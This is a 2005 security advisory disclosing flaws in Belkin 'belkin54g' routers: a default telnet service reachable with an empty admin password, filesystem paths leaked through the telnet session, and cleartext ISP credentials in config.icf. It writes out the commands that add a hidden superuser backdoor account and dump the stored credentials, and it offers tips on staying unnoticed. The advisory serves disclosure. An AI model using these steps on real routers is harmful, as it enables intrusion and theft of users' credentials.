-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory name: 
several vulnerabilities present in Belkin wireless routers

Overall severity rating:
HIGH risk

Devices affected: 
"belkin54g" family of wireless routers 

4 main vulnerabilities are included in this advisory:
- - default telnet backdoor
- - password-less administrative account
- - verbose messages in telnet sessions reveal filesystem structure and
possible "interesting" files
- - cleartext sensitive information stored in config file (config.icf)

Date: 
July 15, 2005

Author:
pagvac (Adrian Pastor)

Description:
I've been able to identify several important vulnerabilities in
different Belkin wireless routers. These vulnerabilities have been
tested and verified in at least three different Belkin wireless
router models which are very similar, not only in the way they look
but also in their functionalities. 

These Belkin wireless routers are quite popular among home users
probably due to their affordable price and easiness of use. This
means that the following vulnerabilities and exploits should be
present in a big number of devices available out there which should
be very easy to find for wardrivers. 

Note: these routers use a default SSID of "belkin54g". 

- From here, I'd like to encourage other computer security enthusiasts
to test what I found in their Belkin wireless routers and also let
everyone know that positive and negative comments about the content
of this advisory are welcome.

The first problem is the existance of a default telnet backdoor
running on the usual 23/tcp port. From my experience, telnet
interfaces are NOT enabled by default in wireless routers but rather,
they usually need to be enabled from their administrative web
interfaces manually:


<Start of output>

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-06-06
18:34 BST
Initiating SYN Stealth Scan against BelkinModem.Belkin (192.168.2.1)
[1663 ports] at 18:34
Discovered open port 53/tcp on 192.168.2.1
Discovered open port 80/tcp on 192.168.2.1
Discovered open port 23/tcp on 192.168.2.1
The SYN Stealth Scan took 1.93s to scan 1663 total ports.
Initiating UDP Scan against BelkinModem.Belkin (192.168.2.1) [1478
ports] at 18:34
The UDP Scan took 1.92s to scan 1478 total ports.
Host BelkinModem.Belkin (192.168.2.1) appears to be up ... good.
Interesting ports on BelkinModem.Belkin (192.168.2.1):
(The 3133 ports scanned but not shown below are in state: closed)
PORT     STATE         SERVICE
23/tcp   open          telnet
53/tcp   open          domain
53/udp   open|filtered domain
67/udp   open|filtered dhcpserver
80/tcp   open          http
123/udp  open|filtered ntp
520/udp  open|filtered route
1900/udp open|filtered UPnP
MAC Address: 00:11:50:XX:XX:XX (Belkin)

</End of output>


This device is usually configured with a default IP address of
192.168.2.1. The interesting thing about the telnet interface in this
case is that it provides users with many powerful commands that are
NOT accessible through the administrative web interface. Again, let
me remind you that the telnet service is running straight out of the
box so no user intervention is needed. 

The telnet service, just like the web interface, can be accessed by
default with root privileges using a "null" password. When I say
"null" I mean empty, in other words: no password. The difference is
that the web interface sends the username to the system so only the
password is required from the user. In this case, all the user needs
to do is click on the "Submit" button after accessing
http://192.168.2.1 without entering any password AT ALL. In the case
of the telnet service, the authentication is different in the sense
that the system prompts the user for BOTH, username and password. The
right combination is admin/"null", where "null" is an empty password
(just press <enter> when prompted for password):

<Start of output>

# telnet 192.168.2.1

Trying 192.168.2.1...
Connected to 192.168.2.1.
Escape character is '^]'.

                ,vvvdP9P???^   ,,,
              vvd###P^`^         vvvvv v
         vv#####?^                  ????####vv,
      vv####??     ,vvvdP???^  ,,,        ??##^
     v#####?    ,vvd##P?^        #?#v#vvv
   v#####?    v###P^    ,vvv,        '?#?,
  ######?   ####?^ ,vd#P?^     `???##
  #####?   v####  ,d##P^           ''
 ######   v####  ]###L                   _   _          _            
     ___
 #####?   v####  ]##L                   /   / \  |\ |  |_  \/   /\  
|\ |   |
 ######    ####  ]###L                  \_  \_/  | \|  |_  /\  /--\ 
| \|   |
 ?#####v   ####v  ]##h,            ,,
  ?#####    ?###h,  `9#hv,     ,vv###
    ######    #####L    ]###L        ,v#v'
    ?#####vv    ?9##hv,        ,,vvvv###'
       ?#####vv     `??9P\vv,   ^         vv##,
          ######                       #######L
            ??###hvv,          ,vvv#?##?????
                `????9hdhvv,

Login: admin
<enter>
</End of output>


As it can be seen, the OS firmware is developed by Conexant, although
the routers themselves are from Belkin. After researching on both
Belkin and Conexant websites I found nothing about the OS running in
these devices and ways to configure them through telnet. However, the
console mode shows many tools that are available in GNU/Linux
systems, indicating that this is the type of system running behind
the scenes.

After logging in, the user is immediately granted root privileges on
the system. There are many interesting things an attacker can do at
this point. Most of the interesting functions are under the "system"
commands menu. In order to see all the available commands enter "?". 


<Start of output>

- --> ?
802.1x           802.1x port based authentication
agent            Get a file from a remote host
autoprov
bridge           Configure layer 2 bridge
console          Console access
dhcpclient       DHCP client configuration commands
dhcpserver       DHCP server configuration commands
diagnosticTest
dnsclient        DNS client configuration commands
dnsrelay         DNS relay configuration
ethernet         Commands to configure ethernet transports
firewall         Firewall configuration commands
help             Top level CLI help
igmp
imdebug          Directly access the information model
ip               Configure IP router
logger           Log to a remote host using syslog
nat              NAT configuration commands
port             Physical port configuration commands
pppoa            PPP over ATM configuration
pppoe
radclient        RADIUS Client Configuration commands
rfc1483          Commands to configure RFC1483 transports
security         Security configuration commands not specific to NAT
or firewall
sntpclient       Simple Network Time Protocol Client commands
source           Read a file of commands
system           System administration commands
transports       Transport configuration commands
upnp             UPnP configuration commands
user             User commands
webserver        Webserver configuration commands
wpa              Configure WPA (Wireless Protected Access)
- -->

</End of output>


To see the available flags/options for a certain command, enter the
name of the command followed by "?" again and so on:


<Start of output>

- --> system ?
add              Add a user to the system
auto-update      Update device firmware automatically from a remote
server
config           Configuration file maintenance
cpuload          Show current CPU loading
delete           Remove system users
info             Display hardware/software information
legal
list             List system information
log              Set logging options
restart          Restart system (same as pressing reset)
set              Set user privileges

</End of output>


The first exploit an attacker could perform is to add a backdoor
account with administrative privileges:


<Start of output>

- --> system list logins

Users:
                      May      May conf.    May       Access
 ID  |   Name     |  Conf.   |   web    |  Dialin  |   Level    | 
Comment
- -----|------------|----------|----------|----------|------------|-----
- --------
   1 | admin      | ENABLED  | ENABLED  | disabled | superuser  |
Admin user
- ----------------------------------------------------------------------
- ---------

- --> system set user guest access superuser


- --> system list logins

Users:
                      May      May conf.    May       Access
 ID  |   Name     |  Conf.   |   web    |  Dialin  |   Level    | 
Comment
- -----|------------|----------|----------|----------|------------|-----
- --------
   1 | admin      | ENABLED  | ENABLED  | disabled | superuser  |
Admin user
   2 | guest      | ENABLED  | ENABLED  | disabled | superuser  |
Created by CLI
- ----------------------------------------------------------------------
- ---------


- --> system set login guest maydialin enabled


- --> system list logins

Users:
                      May      May conf.    May       Access
 ID  |   Name     |  Conf.   |   web    |  Dialin  |   Level    | 
Comment
- -----|------------|----------|----------|----------|------------|-----
- --------
   1 | admin      | ENABLED  | ENABLED  | disabled | superuser  |
Admin user
   2 | guest      | ENABLED  | ENABLED  | ENABLED  | superuser  |
Created by CLI
- ----------------------------------------------------------------------
- ---------

<End of output>


In this case the attacker first lists the avaialable accounts on the
system and then creates an acccount called "guest" assigning
superuser privileges to it. After that, the attacker also gives
dialin permissions to this new backdoor account. In reality, if an
attacker doesn't want to be loud, he/she would probably use an
account name that doesn't attract the attention from the owner of the
router. Such account could be called something like "test", "guest",
"manager", "default", "root", or "administrator". In this cas
e the
attacker chose "guest".

I'd like to say that I don't exactly know what the system means by
"May Dialin". I simply confirmed during my tests that an attacker can
indeed assign "dialin" privileges to a newly created superuser
account and use it to connect to the router through the telnet
interface with root privileges. 

I suspect that the "dialin" permissions are related to either one of
the following:

- - permissions to allow a given account to connect to the router 
- - a dialin interface which can be used by the administrator to dial
the router from the PSTN (telephone network) provided that the router
is connected to a telephone line. 

If anyone has played with this option in Belkin routers, please send
me your comments. Due to the lack of documentation available about
the telnet interface of these routers, I could not find further
information on "dialin" permissions.

After adding the backdoor account the attacker can log into the
router through telnet using this new account. After that, the
attacker can add a password with the "user password" command:


<Start of output>

- --> user password
Enter new password: ********
   Again to verify: ********

</End of output>


The second interesting thing that an attacker could do is to browse
the filesystem and dump the config file on the screen. The default
name of the config file of these routers is "config.icf". This file
can be obtained in two ways:

- - from the web interface (http://192.168.2.1) by clicking on "Save
configuration"
- - through the telnet interface by browsing the filesystem in the
"console enable" mode

After accessing the "console enable" mode the user is provided with a
bunch of powerful commands, including popular Linux/GNU tools such as
"cat". This is how to access the console mode (notice how "?" is used
to list available options for the "console" command):


<Start of output>

- --> console ?
enable           Enter console mode
process          Execute console command


- --> console enable
Switching from CLI to console mode - type 'exit' to return

Quantum>


</End of output>



The way I found where the config file was located was NOT by browsing
the filesystem manually with "cd" and "ls" commands, but rather by
exploiting an interesting behavior of these routers. Basically, when
you save configuration files from the web interface, make invalid
http requests, or save system settings (from the web interface as
well), the system will dump messages on the telnet interface. For
instance, if you connect to the telnet service and save the
configuration settings from the web interface, the following message
will be dumped on the telnet session:

<Start of output>

Saving to backup configuration //isfs/im.conf.backup

</End of output>


The following error was dumped after playing with invalid requests:


<Start of output>

Quantum> webserver: ewsServeEmWebInclude: '/shared/header_start.html'
not found or wrong type

</End of output>


I suggest playing with the web interface while having the telnet
session open to find interesting files and directories as an
alternative to manually browsing the filesystem. Also, it might be
fun to try MITM proxy attacks against the router's web interface with
tools such as Achilles or Paros. This would allow us to modify the
inputs included in the POST requests which would normally be
restricted by the client-side forms. Doing this should hopefully dump
some interesting errors on the telnet session. 

The following are some of the directories present in the filesystem:

/isfs/
/shared/
/webconfig/images/
/webconfig/styles/
/webconfig/styles/
/webconfig/update/



Many tools are available in the "console enable" mode. In this case,
I used "cat" to dump sensitive information found in the config file.
Remember that a backup of the configuration file can be obtained from
/isfs/im.conf.backup.

Interesting things which I found in these file are the following:
- - hostnames and IP addresses from the DNS table (these are computers
that are connected in the 	  present and have been connected in the
past to the router)
- - ISP account configuration including username and password (yes,
this is all in cleartext as well!)

The following output is an example of DNS entries extracted from the
config file. Note that the original MAC addresses, hostnames,
username and password have been modified for privacy reasons:

<Start of output>

N ImDnsRelayLanHostEntry
ImDnsRelay.ImDnsRelayLanHostEntries.computerName1ipv4
	A hostName computerName1
	A ipaddr 192.168.2.21
	A macAddress XX:XX:XX:XX:XX:XX
N ImDnsRelayLanHostEntry
ImDnsRelay.ImDnsRelayLanHostEntries.computerName2ipv4
	A hostName computerName2
	A ipaddr 192.168.2.6
	A macAddress XX:XX:XX:XX:XX:XX
N ImDnsRelayLanHostEntry
ImDnsRelay.ImDnsRelayLanHostEntries.computerName3ipv4
	A hostName computerName3
	A ipaddr 192.168.2.4
	A macAddress XX:XX:XX:XX:XX:XX
N ImDnsRelayLanHostEntry
ImDnsRelay.ImDnsRelayLanHostEntries.computerName4ipv4
	A hostName computerName4
	A ipaddr 192.168.2.7
	A macAddress XX:XX:XX:XX:XX:XX

</End of output>


The following are some of the settings related to the ISP account
configuration including sensitive information such as username and
password in the clear:


<Start of output>

A weLoginName myname.mysurname@adsl.ispdomain.com
A weLoginPassword this-is-my-password-in-the-clear
A weLoginAuth chap

</End of output>


I'd like to stress that the consequences of storing the username,
password and authentication protocol in the clear can be exploited in
very malicious ways. For instance, the first thing that an attacker
can exploit is the fact that ISPs usually give users some web
services after they get their DSL connections set up. I'm talking
about things such as webmail and account management services. By
default, these services use the same password as the one used on the
ISP account (which can be obtained from the config file). In other
cases, these passwords also remain the same because it's just easier
for users to have the same password for all their ISP-related
accounts. 

Also, let's remember that the same password could also be used by the
user in other services such as messengers, ftp servers and so on.
This type of information could be easily obtained by an attacker
sniffing the network either with a wireless sniffer such as Airopeek
NX or by performing a MITM attack through ARP poisoning with a tool
like Cain.

I'm sure that if other people play more with these routers they can
find other vulnerabilities, exploits and interesting functions.
Personally, I was surprised by the power that these Belkin routers
give you once they're accessed through the telnet interface.

Because most of these "belkin54" family of routers give you root
privileges by default through the telnet interface, it is really up
to the attacker on what to exploit. It's just a matter of imagination
and curiosity. Some ideas could include redirecting users to the
router's web server whose files could be previously replaced by
scripts that would exploit the latest vulnerabilities present in the
most popular web browsers.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQtdtRbteQP8gtTAfEQLVbgCdG3Txno+dGhLtmvAytTrYtVwqHW0AoMIK
Yknf7sFxGJw7hbIK1oX642EB
=5Mdx
-----END PGP SIGNATURE-----